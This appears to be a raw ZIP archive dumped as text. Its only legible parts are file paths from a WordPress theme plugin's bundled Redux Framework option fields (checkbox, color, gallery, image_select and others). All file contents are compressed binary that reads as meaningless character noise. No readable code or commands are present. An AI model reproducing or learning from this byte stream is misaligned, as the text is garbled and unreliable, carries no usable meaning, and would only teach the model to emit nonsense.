t}_0&O/*p9?r\o؟lf_6f+Z4Td8|l`ǟwWTʾ%>=]~hO"PKYR[剋Ifoxiz-core/lib/redux-framework/inc/fields/button_set/field_button_set.phpXYo8~ﯘF>,i6n.8.(ZmֲScCdii~D?|sԛ2y /_x ?ᔓ5 9DCC>Ru(|JǙ^껄+UzA>.Y.>2;*a ~$©'q6zgXW_qP?%lᖤ+!V/XD>*;,PU}7;>{pĆ>@&pksѠxz6H(1 AcÚ>/!IB fGAeLN^?mWom)Lfګ-z͟5DT+駡<"庆` JɢyA*D5a>*F:NؗĘEMA=doȅ+s9)f>W(V K5!DbBdT(+O18$C/I=JNHLHiE bT0u*0.VR#2*ds [Dgo`C]\uW<۰8vhj 2i+=FyK Z UW~t,(( eex9Zʆ,<C;1|1 dTqSԓ }΢z~CB|>/_ D Y|| mSݠ9]0!)w]M_l;U\P} =dW E 8b؅-V;YZ/^u#߮)}f_-O+!O2l]ܞh :i(ڪ9jliNj_`9\woPKkT3foxiz-core/lib/redux-framework/inc/fields/checkbox/PKYR:얭oEfoxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.css}10 ?t( 5A@j(=t:(Nۋ T [/pJi=*%~v>)Wm\]c&e`x?>PKYRIfoxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.css.map]1 0 ᠛^C,1`E];bO=8Y(bm^ HR &% =-9p%r Ǟgl?oǠt(wdnZݫp9v-6LF/PKYR1F3Dfoxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.jsU]o0}WܡH@4(O}ʘ6Y6}dsa1z0U#ݥ<y2p+GDUdfSy8wR:Jۆ(+K |8gtS))@$4'|3+N+y3J"H%Uҳ.[sn* A;cE1=1\݆mlIYI X Ɏ7zgŭ1LѲ)9S4ToXR@[CCƚߚ,?QV"ir`MJpN%WqspA9Nc$4/jj@`QV9ݜ=J'jqs" "S4t:,[U$k& c{I~ Fڱ=^ DEݿ_h0GKp[E=.֋48`yI8JΘY1wׇ 즽 p0z@۠V5zfdD.Y_5gDŽQ~G>6S_PKYRHK5Hfoxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.min.jsRK JEY׸ @F{Y${ңTTv[$Tu9B&;.ݸkۦ6,@^2s"-[Redu ԃ.Xӱ?9j@RHך9jE d5-";0+^/$ YqXg@"L!^S (e/qB̀7aCHؿ9Z{gPGa= y55|D0W1B#"Kg;bL-0 60U]|4X-%Jxעg'5)N_( O@'2u[} PKYR(Efoxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.phpXmo8 _Ŝi>.ݲoiaCDc{.)IIwi[$E>$I~"gI@Gw8lR9`(9i!K@H(-m9 ,T4pN]D\s\NCp\Ku~ވ'S5;qN>>yi.p^ŒK\0؆T!fz)٩vT"1iD-\a ǫ{~1 q|ƭ)1b1 =Go۳%^]|Bj׽Û^?ߜuW:49A"Pgqc6ː L<H4qTAZgGww%y'#?fB 'lā0gU~8<1'w3rDZex?BSкJ>{x:5'Jϕ-oo>} C`aȕB"x-xHu ޫ҃}gLq>n744D9Ce SLeVdEQeӼ4VmۅdR$h͌oZY#8Ml<ԩH(UTrwK6O%04fk` Rͫv&\=FdՆykxTŬM}4V%׹5TD+w"DL {&([ 0==घ.!s0vu";ڷTR;` \g//oRbAk-cI*U6p9O3=oUļ/Ǐ)fdYu4bU*Th1[:Wu~vEwp2:@2qB×.FmꊮT8m!+Z<"4R^X:ď Q<4q%KuK(+r00!IܩzXA44x8N{v6aV05%VI{`@ '+7gxkxߛ@7wypfLۂPB G4"6vgJ ܶnZ.}.H$xX*zⳣqDTL~k5W3CPk|2S0,(ΤX?QvwR&A3mEYIy<0?`sm6spn@x^r=4V986S_Mj*th`4l;,VjHMnj$w$wHJ|=po`K\ /N͓jv?<}ch/RmS&V5ӹI4(2'/foMXʪp1WFk2VkbV?7C,Iim_,dԳHɢ&~Mϸ-wPO4 =9)v?KKy"KT'TJiE_U!UfK>Jsb%s÷~C!J7xZ4x5u]61Zv7oj%`Q h/eL [ϋtz =Ŕpihf^*4ظq @BjԃёPoEB&:-\} yS-Zr7ۿ_PKYR*.t?Ffoxiz-core/lib/redux-framework/inc/fields/checkbox/field_checkbox.scssUA 0E=lL294c"1ڂXy2\9RVn$w V{xQ.P @Iw{ȉ} nms]`<= QTŀP(\m;!bKPKkT0foxiz-core/lib/redux-framework/inc/fields/color/PKYRfFf>foxiz-core/lib/redux-framework/inc/fields/color/field_color.jsY[o6~fR6$q@=a{h:h" 8 ZCR%S#. -߹_${0 0Ne:!doxEC3~|FROKK S."?q32%&.2F<~n_O-q]#e<# ɷu!Wk>@8s*M TrWwӴ[nAZ 48uchT-,Zy8rM<*dVV[8)X:mT֭x 2o`f㔴)a:LgIh,`! ->4@0x(q`4Fi\yIڽY:r<XdIaO&I{:Ƹ0G WZQ-*)pB<-%@E2Nzrjc107.ρhN< D5Y!T{iL͐܇f#MLc=PZ')i^E@UsSmq &}U{J/~@GRg8$^8Ұ&ln}bgnxܭ-jD0 dONju@ԉ-3FK+4N.ϷNem#- `h0g~LKׂ4)淂Tx򳡻xFhY5zUSUG vPKYRɘq?foxiz-core/lib/redux-framework/inc/fields/color/field_color.phpW_o6ϧAv8I4 lE0 -Q6TIʎHJeI ؔPǻOާF# $ӥĒRP"K"iV"p4bJK64"b@!-g4s"/7wpA9$lYH@f41c(f2R;+t-Ҁ gg"`BD̈6.-YBh%-j|n {7cd3tA CdtCWhA|>$| S xk8{ɚchg"q@2 pB8F4/fBvTeܒA镲E%/_cpg10Ja"Mx!Qm|u`(J 3uP;g·X췲 %K2\u69{1tt*T4dC繙>0SڰS" E?jpD׵2 r ,r0es8`*e<eZB핷hV.*d>GVLLMb|+Y6%XOL+e]>3޴ܩUe~oh\nuz L815tq+x[[*åR)6'fLt>inte_W`wYvwg~P/rW:MnzjZos.tLyrr]KfՄ=hICuY-w n#{.,~!"%+&ԿPKkT9foxiz-core/lib/redux-framework/inc/fields/color_gradient/PKYR\-֗Qfoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.css @D{8;-.h$6v6ln׸x;.+wCcT BiJ>[DM5#=|?m{jɡ -1"Kg=ݵ9c.瞐 .A!7>SwI)ϝ4nj) 1$R֫/PKYRcUfoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.css.mapm 0} 9AI!TA RXmR@M73!7弶lfKGm:VpIPȩ-2 Ã{w~ɗL y Ċ}o[dQki y{uI[Wun2o'@zt#1PKYRPfoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.jsXn:+nPɩ-wË.o2EfJE9 Z{=,Q .Eb<9 H%' ,Q^N&H7DO9si9HFxOsp'iЂ7{N)K6X.^*(eҘYO:!Rﶻ%lDsDq0G?0zSf%F?ԛwQX9ёOXZG*C%Jv8DV7tmES0&W.D!X(It2~֘n73z{Xi `D7IöՆ4J̣8#^{_ Ӛ.!2q X֏rtU!nz jQǃkdY. cT^ڂ /GsjJVb9'|$НLjhg;ͺ5- u6u?'WƱﰟAISC {4%8viˆz,jl:`{1|lWʞ[5M|hkвTbЇتvU}yT_bQ:t Eo4}L.X]ch(|kH`ߤOQbi VDxAU}rިF\ѮVzl=u;ְs?Pm6!WɎw`n@;yR5.m\+w_)m92ˏ6 zӧVm𓭶TxpZMNPKYRcTfoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.min.jsUa@+w[\ RЯgn#=;DcbYhyo޼lUhr˥8ÃGg]%KPӁ{2<|6`qSb,ő*9\To5gIlry\LwƛEPEi,IŋXQRYw="Ƶ"L9sV7Fi)Ěd+Qn4c` 5]r0EkQLl~~~7jZL[c'NfI0Iɱ+N7{[&T(8h&rIHV=Rr@V*nclXM?B(aH Q -{yӪ MMV .*=c4/׊F_da*}!&dFvi~ ͖p1U+]ǴJuDVtzKݟY:3>qmspgq햐-}+nm.b:kS{7xj r,2 ˓h 5رd*& Chq`uƪWXZRI?] # |ӔSG fPKYRxJQfoxiz-core/lib/redux-framework/inc/fields/color_gradient/field_color_gradient.phpXo8_..0>n+-(TM2^Ck;B[_?~>9#%u ^Ð=%w$RAЀI%$U0 W 8Ԍb. ј U:̧@$$zDhWיLq(y *$` $^ADFڍQ@ẍ&-YB*iFMy0:t3-|  Y͓!2!HVFx:<9%u`tyz} OCUo8\pu3t}چkz# MLiUE}1Y,(ҧlzyz:Nƥm?aBU$x]B;2[ÙiN}F`|#.g- | 1p&Xg3.՛oo Hz'JY0hC4MMvYƾf&E#i`KӂT,gAa[s `<^X^My!On6厪Z*e mdzYS Qi|c㒪$Uv|aWRX<]tMl4 +ID&B;@b iw@ziZ77|B ܝU/3[l5)d)!阈)IqYj3q;)r1f*]ژHS}&BC+A3Tl/D&GQv,Ƥ+/6nZˠoϏ]}̪*}WE%QeO&~-+usfƂ[Kv'=]-;ѻ7'o)IK^܀?x@H"l3ndF;)0#Fk^-XR9'Xb vۉf@)x<<#[[PKYR=:,Mfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.css.mapRMK@W^""4 =ҊE4i>B3i{eo޼EMB<\ȁȃJP P90+JNqHp >h)0erRC${v$Cr.*EIS tswN+H5zKLj1KN`l'/EP5V#Km/KQD.ps^Di_N~ 5EuSenMMڧyvhM`K9)nCy)98 RaX9;$\q]3F@H8u}Uuټ}v*Sz?dIB} z"a:到?E+_@9=sŇ+f|Xdzʙ,}'3+Z\u bfiy2Opֳ,%s )M?qM"2 HiiCݿU|΂,FױnjrGo x_¥ف53[peiVi 9Z޵ǘ Cvr~uEBALП WS*BQi-)xLkn*\԰x Ǝ{\ C/uk 6U).| .o?V3HŖ]i:r0% $\6 d&%{u`$<?t<ʂ%)ͅ7T-M1?^w5Se)rb!ݼGTCQDu'U"&;#4?TEuj*iUw;UX,xҭlmUBN4X)%tCJ18Yd쓔 N qO q*;JJ7]$` H@d@:%8QL68}Bj*iWi캡&AQBa Y,(`op{K#BdVQ8\SBTi[H$ c d7喊Dd!kXaD;fX|HqI(Nw]zK\ĖFEY ͒D(XA䰿ݘCe?ڮ(Ұk]1NK邰*]!,tr 0>B8Et+V~8devrLhҗOc e`.F*Np^s22NW+%: >ilu3@ 6e<%mӰAЧ95#ܡq3e Bs=%lOcsn{B@3wyʂ=Q_Ki:Qi-`Y){݇.ᗌfº>qv%֤G k`mp3_z =Ѩ7"Sf͓_yV > w,pnM;|8 ZX@#>{G)i{G==ݽ} Z3}^> l0&v?vSƘ2MSESfI]YqO;Чp0)+HJȜ#s =ˀMp>5Dz6مn酯7O6]5NUkD].tni%K_ux9ċbm"=k\3,>ɝcbC21.̴_|QaBٱOo@ݓhEElZ|brMdUb6 ]x!d΄U&95=}Eyy!,j9cQaЄAQ=1>º_v1HU??ZZPKYRk,ϱ:Lfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.min.jsWmoH+ (BQNj{MSUE˾ؤ,X$e}fye|"ʢ ZMAh8붮(xnSfG#.˺i99v z0^Ck友.24EՕeeS36|S-p v`G iZ~UImTKsc x gmؐn5ջTU!b#ravk^It+f.,L$ӻ-$)*L,{\ ]Y;VNE*WEk;$ H{Y mC؛7lp.lw<åhZ!X@1^)u 6Mu}y-]B~ ]аWϟm@eDBxݗg}C}m0xHU )7+z>حsȝ>͹6BQ:ht$\8ѐ ZLtGZ:۩םtrr,뒓2,c4m@YߐK dQfӚ\]M]UNXe.^̾}3N=UpNգJOIy%Q)գ$.ԣ$1UJ3;2 ,B|Ԫ|G}bHR\#! D$ "LPA,P f Mi`|IL"} aqł5 : ɉYHSoJxO3`BfF4g\ISlQ&NBNKHdYfQy腪fHxy6%PDQtF>M07IaY{'d6$"Lx^Q inA!)d>v8pLx_Ȃ!4(ÍUi,A7'(c4[Ѝ H7LQI](妙kX%[r;ݚVn z0&q[rG@K _܆"R_/Msk=,ɷ8ܼ'n>vn{==郎ZZZ;tp?BY}'=dAvYnT:ʅ+jZ9/vI[-|$k/n*.EPay@kV9PfXtB|D+Gg_n…dvvy~ ٯ:O)gfMdjOYSR^˺!K7هv3-=st!qGla<@b磑!U<)ΥowLj'9 |ӑz?gsA9D ma@Of8t _PiC8O7:֛ '7?PKYR9p 0Ifoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.phpZ[S~hSTvq#6؄@  pR.kKHhF tK@:uF3WE >{38^rDZa|R<T8׷N,va&:“J*'a Гu ''b ZK~y~Β+_V"Pƒ I h#ǰg1cAG)wzbHd0Bc&nÕDyR$dO/O>|^"^Vȗ&Nרy~:}{z mGpۃs8x~h)F/t'#}X g%0֮+71\5\Nz }:ڝNooo'A2 ot?+E}9s-Ѩ*#d 6IFdI0"1? |+'p o"NFN)ab98+By=}bOso..OkpDyO2`K0c\`XyLw! 5gf.?TT&+l s FL>FIr9i7CFC!#a<٥sӉ'8=;*8q &+ۅ9h}i8ST7$ g++3Vpbؤ9Bg'3 :J5e LBh9$8mDW/*Fx L:حXp\Q6RڮC:4vu1ku?[ȘjiXIjwRw{9ќ\ئ+Դ8Akfoq]&\^\.ŕҹ=m`0?\{5NfŴR{4P>bv0kLzb!dmC[ Dn,0xmMVq b̊ pq쌥왅A%vr6͑Mk`A?\&MC\QDUyL}=O+#k8cGK! [ j:;sL=p^i̽Jj>S%aӊ.3즻ʙi>hI{ <}'Ua2 >44/IӣƠY-f1x:.ֆ.8|3`g|L?O*(`P~G'NX.ݏ 5~NkNx3,GOCOujeeyՐ)udP3̥Ϭꗦ)L43uf֬XіҐI&Yy:rt^UCAJ}n>~ry!=O=sw[s8[]>&뽈k v$of!C_A5ǞX~h`3>:P+I;6>S*G0ǚD$NR,L8_I+7VtS RВ'tZkJ=u#g4'`)t/E'V%vءX!1[z'a)*:Hx"3@ï*{z͌gnW1rEn~ 5bhPDMx=M0EkVKbx>B 7K0麲7Z.1'Zlj}ٯצ>h ^"^}KMzt*ZdTQ4*5Rh^I-YF+iS65!&ŧcs-4Ga.KGGJf˃ l#rhQɯEVp]")FfcIΥKVngm)ۦ߃5SX']4}\&mKT3[yPQU0@KU%wQ:O&e?hHʯCG i4p"ڊOAkn]aN b[lFuIYb9s(5|ņR63Ւf~mʼDR!%/Ǣ>MyaxQbOm~4 WOn> AY] }lbjRYX߄uX ۛE@cbvw0&̖2I޾ԅ&L/B0;/,/M|ƺɞ; &O/Lh/XTfOIFv6Ix~IuΨ f2?Tq t#8?{<=PKYRpwJfoxiz-core/lib/redux-framework/inc/fields/color_rgba/field_color_rgba.scssTn0 }&_/Ja |MEEzP2RiK vlxM2QhİR!3.c܈>㴤l %tO<h&N1.xMNՍ FYu[&!h_i9K( $8q{p f+šIʯy|~8Mu--]Z*ƭtAȃK^CYu|`9ߩ+>;4 0bAzWPH˕UұA*3n6];!-BY׆{+&-PKYRBt @foxiz-core/lib/redux-framework/inc/fields/date/field_date.min.jsuQMk0+YB>^Xc<1[tnY+FҫY 6V,ijֽ*啳yW΍ Q5tYMF͋j#',9I(/jN Jl+lCfz1bC B)l\Z6l7`[G5YX !MoC'pE!rvF U4LyX%&ɎFy!3g3r!nn>@M^U;xSOn 1q%?cuF*cRN_%T H#OLOMh S/tLmzmAh XԢԒe/IPKYRo2 =foxiz-core/lib/redux-framework/inc/fields/date/field_date.phpVmoHίFL*mI䥥mH)"DUT6f:p!myvm1+q)p B-3d &@aʵQn4 2ÅA5 3pvy g(P6 \F` '3L8R9+X o;JH@XAZDRCdA̘q!-y-՘ټPH_лѨw99$e3t P|^䜐) ńY9.hʡ&flbb|<SR:IJ :Opxog37o~?V fNP B(9~"iL=U π% jM(6A&dd\`ڄjGp@5a#}"2Z*90i=!em49P`Q}E(Ԫiuӟכ+ }j61Ru6OG])anaCʱk9T@ai喚CFV52+7Q60Gcy`'W̓Y{C&Q"Ͻֲzp+ DS^v'V.Xt ޿:OU`s|,WNurPu7%6w/Hp &Un\4(wr[Vk[N.Y7PvpvĚ`PKYR,'Xn>foxiz-core/lib/redux-framework/inc/fields/date/field_date.scssU@0 }Xf8ԣX]NTqz_PKYR2f% Hfoxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.jsVMs0+ʌM # p록N~#5V*dFI(w%acl@=}&k('Ͽ I؀#"!)^'^",!!9ZP@,YQʀ'| Vd=}{#Q0D0a)5+dI>*%&)"&~vn>Fg pɥUR:b 2$,q M9>#b+iQ06#YxS6c;* pJgLS}Tstn;8J!GNJz& Z”V,K#4eRG"F cK}1PKYRpo "Lfoxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.min.jsR͎0~ĕ"[KG(!ZU}aVlN*q~.[-c2y%я33gs'3R'ٵ!p] !(/D׋0Hg-jVs&GmQ۠Ђ^A=>`BTQh[a H0 KR~oMأ+'Hhx7|( f $m u #٠ P4kKܾRz(cꗽO<C|$ >y'p1s/[etǷg\AkmEVr-bېfb܊dy!*b%JX|1H1EL~v>ES!T S<> F)*QHjcxCT!z>FPw/o5E 5_ Lǟ7D PKYR{&M 7>Ifoxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.php[mS8ίPHr\" R)#؎$3d_${`mXj[O덽<"PW$W,ѐx8xwE3F}}u @Z##,2~4,MDG@Yb~]&qD~bP|ҤHӈ"A9$ 8M{w uB ]~p1RUKs?r*OB :4i w6,@:ystZ./m=lkQjl9}C1+h߸5s$TtzlSt锜rrAsy,08-,ޒEr*fCGv9es"&%t!UN(^v9iD+HݡR-"-&iWjbF#kj2oVNU4ˀ4Ŕxڭ]ڪ>mZ2!4%g1 v}"Za?jp;2Z({R`1RCd.\wOUՇ0dɵh0l(5:w9u <C2:ix+&_ s3ET$T*PH)KJ 8h+N drNC RXL-jMQP+Ƥ\/$  ʎVBj~63t%y{Q/9KǒpպlݭܠZ3vvr ਍Rt^H22Wce Vf>GlF>u͉\M;4/;u7.㚐.4&C9rC庪['rCB}$y*/@H8`!, _U&Cfb#(+g ch/b\:ӯyW2 od9Om.z;nXia]\؛^A o KJ \MMPŮjDl2vsL0U 5.G*rip.rgy A7r {IqyFXEC/oO fLo\ lq8^[AL S> Q q7 _f4[aSbzMzBoDծLs#6T#XA̍H&aю6Xd4dAG&u9ÅL:7dkU0QXA2r KRxXR9G߇Eztr7gb1h5Ůę]|;Rxm^ZKqiFv"X2(`545TotP[(1jF` gBO}kmq!*k xa->M/o`y[2<ݜG̪7&ŁG ,~xSѰ Hz#/9D9ٳR%AF8nn9@3]S{ <1/LgP9p7@-lpSɐ7h; B ]mrI|g"T?;^D|ӝZ S״t_\l87nze`,/BlW3/cGDt{y_DpjMgz]yyguMo"u&eҫ,uюO nSZ)MHn/~Jex/6R4Us2U(׷Qq[;bA2GKۅC_ :4վ+aoyxi]]B>]FN rxR*<=;&aXLyUjtڥlmlڡ[REl[[PKYR Jfoxiz-core/lib/redux-framework/inc/fields/dimensions/field_dimensions.scssRAn Jr&KRWQV{c+r vW3,yD ѐ畡 ExPP_.g'N 8 mv[۱ָ (ZJN>0J.),p wش`Sp;.~Y Q0_9b${ԢvOI'3yV [%8"1?*S}f5!9ŝP'BJnhER3^)N㛹ow i|3ccY*PKkT1foxiz-core/lib/redux-framework/inc/fields/divide/PKYR m6Afoxiz-core/lib/redux-framework/inc/fields/divide/field_divide.cssN0 x"TXJ.Gd4t?L{w5c6/ؖJHA' yXIXfhIƉBF-YVHKTh[&3iY-E,y).y֠u\u`PS+wv 1O< ɩD^SVfkq|qgQ^wz'ϴw̡7`ET ZP'k^IG6 ׇm~ʋ]5|k:8m ia _"5Gg{\~lPKYR|UNEfoxiz-core/lib/redux-framework/inc/fields/divide/field_divide.css.mapmN0y +BB\iF%TVDB(JܒMC"rxFޝ7`X;CZUEmaHF'.# 1[pN)0uᒯUfX-̲B0 >++@k%{^X)ji[A>bdd95'[i+4~]V_.e~k̽90w]lF^ ZKRP)d\KrsvسW+g;;$^^q&Moӧ|'3zHƧYO =}4L]gjE[ɚezi)snPKYR_af Afoxiz-core/lib/redux-framework/inc/fields/divide/field_divide.phpV[oH~WVњDJiHX **4x3V{fl8!$cs挏Ӽ#o+Tw5$ L̊)<1 c3k&P*XȘ'kE2+bT`RjA&Qb ,\F`r')08Σb1@_03\ '%*Mϰ_lT5dl,;/dI*.[ꡦȲRDe|Iq1d~Os:v`bzM pk/@}sT G62RukGRbhjCZN[Ư&s!KYb[^$gK.F(4q.],np͌ Б<>@֥8$>(vYuC?+[b *󮏡Ⴆ:tD1QB2+SiV@EٞI{\3,&u *x/˭}xbhHhwCDL(qi^uQᜦ+7yaͽ2gsGEmL 唾0ŭU>-te|fVo ղ~4L٨PaPf,Zw+PKkT1foxiz-core/lib/redux-framework/inc/fields/editor/PKYRqAHAfoxiz-core/lib/redux-framework/inc/fields/editor/field_editor.cssRMo0 KX^>bO?![CD=^yY7 ]GGR3eM5: 2yQt5< ,\+&NhoѩMkcе|-#KY3k4#/zL |9(oHpfQ8z] #L^Mˎ^f࿐wgf\o#G V:hZ?P(K ՗PgT])~.4چs_=jo`cs1h7!n#i[dɫ)i@}7&"Oc c {o7BÖsϽ>kbFo3qsѐ5w;""xS`*C =؋`P$ C`YN 1a%ģυ" blwb5sUoWJ^J@!λ,`Hv .=jQTh#n` 5K$yZQZ_phh0]M״#ͺ}܉Um~;_S7~,AZ}ŭG)]ۦ[Q'nV#D- C s}+f _Gz붸43c)xSYu¿'eePKYRz x @foxiz-core/lib/redux-framework/inc/fields/editor/field_editor.jsSKo@W U%qRB\PYM]^'X;~0?YLW_!V ĞIѹc*B%$f?s4Dns#^ 1E܆d $l>q%yaIOM[;0| r:}C^d1%z0XD,ΕR+ā^Bfj5TKL=TƂ'<;AE~De `v[Y,SRI%nTe~GԹeFu"c`HQǬɇW5x9m],FPXKIŅ+zkn*ςvsc@NѽVw61JЙ^WJhX){ra^t R{ ^7/.PT> obB_ܕ[`١ V=m}r đJA g o.ڨy]2&-xSE}8JT/8 ԜrqB>kuPKYRxF=Dfoxiz-core/lib/redux-framework/inc/fields/editor/field_editor.min.js}j0 _%X5-a Q<[n]Zgt#&~}K3"'hXXD V+-œ#*Ոv6rD-062IګtFG J][ hZ,Th&"3DK,9:lVQ}Ao >+j]fP(Nt(q$m1hS3~q:-/ CQ {$m.e5Ȑșok<"1Μ;lכrs_]UжwPKYR  %Afoxiz-core/lib/redux-framework/inc/fields/editor/field_editor.phpVmo6_q-)> Hڬn'԰AQtȤJRv!}GRrXna Ż{xo|׿ ?osaRA_!UejVL1 Ppm`" LxZZ(Z+D Zh8sXb.yB#0 ]sL`pE0|$`f@NrKTUG,%d_Ir0!?\8 {eo c^NBSWJZLo<%R-cKA,ur)ͤ 41qVL]faatxjhos߲o ĺ5$:K} ʳr+$\4%4R^|.% YqMw㒚`䒉}WSTw?u_t_jHg);cԚ2pJ- #6waor!ѲXH'{ƉaOj8cZG&ES:\wcXj҇$LU{oA]t䊘t~+(i ІHNm˜8@]Ǯ "gRK|KtH$M%9]rY|#4KS,-DleÓM塒rOcX)oXJlhb{81ѤJC380sN+ZIɇlܬQguAupj;a]me|a /^L>\:Ɋ5LwvU>s;3m$sL_6hT}(ۇ5޳s EBfoxiz-core/lib/redux-framework/inc/fields/gallery/field_gallery.jsXK6W̪RNl*vA[- Xm3DA&,{es%΋J6kCͳ]c/ྂgl<Of<4e,c9|J(J"̾ F<< Vo|χK9-Rh:*xdmuq덈 pu2VpC&Ӧॆ9Zf1j9,SYj&J^/oBu o{q!!YOy2g5Q;{ T6dW88鎩rj㔱=*<2K'F9ùوZi2F0!RNd/#G|`Rk|boԿ{>0BM5D8`֐"@W,)ih-KL J32=4kD};(qMXJ7{SK$ 9v͈OW8j6Z(c 6zTZ%q侢ڀѽMCS?i )y(`dUF9f C0Ʉ6U4_(/'!ʹ]䰘 KM{M'ZŷH6Yt(FzrUɂ(8T;ѝ.JQĴL>b}}/? L~/pڃo0<#bBRYt9?5? kr,zg=0)i] $, +C 4,"R%3ZE/sDSP.@๵s f~ojVaMn8nYxL쵫1kU %æzY쁴Q؋,DQAp{^$OU,-s@k2_54 ;iۀpa?Tda?~ w"㦰diLמچa|y=*z.PG8u<5uPKYRjWESFfoxiz-core/lib/redux-framework/inc/fields/gallery/field_gallery.min.jsTMo6+ X$"sS';Z@-ۢhqlMJ9r6u;T,Ib^l/:!A(bCb۰R0Vo8᭜=R}b$mh<)NV =,ɠ<"p@(U%`VaobŤ*a 5ggR u-Hݛҩc\5rԪEkt|FWB"CvaTq:};h^"=nc<A;Cz:ҍ I1QKָq`N;5bWw@:[ z!l~Y>͒` >ž~I>ҙaj?t7n$}.T]r~Ŷ T4!SIJG#6>Y?KrǕl]0q,)aLz\>"`f@N }/J;& ]JvT\zB@ `^C!a:Fmh) ͤ]T- g5}b0՗\ >'DZqa|ܷCC 6Ge|N~1HUx=ORԇc9He;`a)=E1ǡ}(YzǦxOp~T'3"K>1!P*"Z{]LJV@LXLw ;M޻;Zb8} X1GƉ+{؆7Db%fm=}~W2UfH3&!ac ǚLCT FE[%ׂeH} WyA@ %W*[Ꮚxˠ X2Jj^IK[O% ̙hKj22b#47_Z^ԍOVZ#%nx(]h+*g+{$Smu`?D/5 M4Ͼ-׻FhP 2oKW: vx]fBb*[V6,?_>5h-Sߥ'-L Cw[&GҼhoMiv^g`+癡C)Ta=D) [^N}f-̨B4ͦdLhU贽Ձl"鴈3`kXCʻ40z~+ۻ?-輭!J]U\5<뷂wE<Ύ ?t~i"J&ɻ. į]k+im46u %S;NJ Gn=[ {wwɃqKutKMLƱ$Iܑe)A}RaF! ys6ct*'NE.i^]oCHt8 R tR3/Js[;|TM=wjY.߄<F*۶,>}^h`PKYR=,jcLfoxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.jsXKo6W0j{ʼn=tX-Q6weQ%$&3d3{(:@`gy2K$E&nNO>ٲblyYs;5YU$F"$dFҜhDb3dDyz/_yb4;WCر <_NYjqVEHRT;^2g>HC+Z..D!L8:{f-G(ݺTуTz6WfHCDVFɪ\^=-9,f0L\-|5~JN,=|8K~#=0ExT7[;|)4*6і_s5,Z5+9+Hmh/9j+ҔS|&JVJwT;{@> C A6. 5Gۜl9EYŠ@iipې^I͜oGF\>瘼J$ bRڀ>w&=.: 9j-?xJmAl.*[/yLKwAHA7s1^jhhO*nd  $Z';G xbD;,2r?rہj/cיܯ0Z'N r%.;Ida- r(1p]KcD3 $@ I{Cw34ru2 ׿*/PKYR;(iPfoxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.min.jsUM6+2 D$,)\EsEbaXfB IyW3,[( `&g޼yŶեFSu9oeʂh%fJwΎCsɚWv{/ A)g.:z&=(g`8)sܭԂlJ+k&|肋AiRMq. 9ˀ9=Ű~'K+]q(4.ڬ3WvVZCd$Z;)WbUBfWm2!tL:R|*uDׯ3/8TFI7dCdkP,ӁA{ _3nZr!Mx&W6J"Nl 9M=}H׿[[PKYRY5 *Mfoxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.phps:{ դ%> Kڼi\Ba-@,y~ I{|Hxt?߁pwqh޹ "sCHEQ2)ߍE>/eH RDcxB\f{{, \1)a$Њ3ZgvSm`Dwx%D  cv\]||>Dt,3E#eT#qtWoᒓ_ߟ>pv>xz} gWp'W77O׌bƠc4RB}(P;gK9ŋ~& p"Uڱc eR[t$"-o3+(g؟ч}es1(bLֵi<!$$ena.D!m92sЁ^rv'HeR^cA?*A5xLtk#1ĜjJWaB&x8YZ];QBWLN莽ފ;AkK;mCKW)YaiUzőf3Mw˵> rPA4"fwo&``k_7687RQӰ9uuJY)nsi׎.{~Qf5}ٍܔ?xlE|ѐt9-!wԹ.gG~B~BXܢn;b+8y]֨%qP=s %T*Ž `nMbص[.OmEaAiVEJ\Ģ%R?IxѸ><xsYe_Q9CC۟;"tmڍ"vqrW&< & =xA|<a>І+4‘٦sF 31y3UbZWɭ Vݵo󛛍&%HSK@A66ûm}݀[+/W2#|ٱ?Qf :uNgH!) ǩZjI6"eIiNT?z`C=7TּBi5W˯Ľ^sBJ"[|:Vc"3]'z=.>%+|8D$ lGzgh8^%)e+(7/vC-Z ɺ x2(M,ޱSWxI y\ K\_S clz|OmŽѦz6NJ*@wj|w=<PKYR0"$xNfoxiz-core/lib/redux-framework/inc/fields/image_select/field_image_select.scssSj0 }Wxї`4e1c[a->IM/#G'3 hr,D?&Ǭ!(+[TbcɪoNxT @/Jc6f0 o;ufc',JcIhZM:xFutej%"fTZɔ1{^Wk, ,:,kzΑC?Ή\9Ka#YF<"Sx 貢/ڗ9B~_S a+҂rAk>Ԙaeo4V޳u?WN5 8k^7oU՚.nkv2s(J 9+3 Ysxu^sPKkT/foxiz-core/lib/redux-framework/inc/fields/info/PKYR, =foxiz-core/lib/redux-framework/inc/fields/info/field_info.cssUێ0}H/Fq.$/gL|k;rB8,]'3ÙaaP\#.F(ebUu 0*>Fֆ2Sawt*v]Vw *$X>4-~ ILC` S$'Oq :&4e"XKx&9)c&pv$ўޞzsI޿dfur腧^=߄u.f T=FfSu kd!"i0, a+h܋5Nl\S֜=&} ŮF>ヨF{O߿PKYRAfoxiz-core/lib/redux-framework/inc/fields/info/field_info.css.mapUn@+ >][ƊBUU[LN;dٍMdA.~3ffgApLoi,岬 ÿRs.(bJT[E'OSgFȁrvm3 s`$Vjo+gIBkf䵢F Vɔ(ؿ{xV.TSQq8v5nU?oE%s8\QB9!/kk*w̮_rkޓ3??8L~-ءQui5Ǡ_BϵhtȻZ;f'~ϥϜ$z$vJ;7E*7Ej)ujztGng+Jcwog.|0ҵxd"k[g2=1ssl7ܷsm>Ԋ0pl)Kހܭƹ#_iW6ؘl3-\^QPKYRD!=foxiz-core/lib/redux-framework/inc/fields/info/field_info.phpY[o9~ϯ8AQ ! 4Q*df XSE=g`!QҮ&cK;Y|pؼׯ_x 